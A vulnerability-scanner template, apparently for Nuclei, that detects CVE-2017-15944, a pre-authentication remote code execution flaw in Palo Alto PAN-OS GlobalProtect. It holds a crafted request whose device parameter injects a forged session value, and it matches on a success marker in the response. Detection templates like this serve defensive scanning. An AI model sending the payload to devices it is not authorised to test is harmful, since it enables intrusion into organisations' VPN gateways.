id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect author: emadshanab,milo2012 description: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. reference: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html severity: critical classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2017-15944 tags: cve,cve2017,rce,vpn,panos,globalprotect requests: - raw: - | GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID={{randstr}}; matchers-condition: and matchers: - type: word part: body words: - "@start@Success@end@" - type: status status: - 200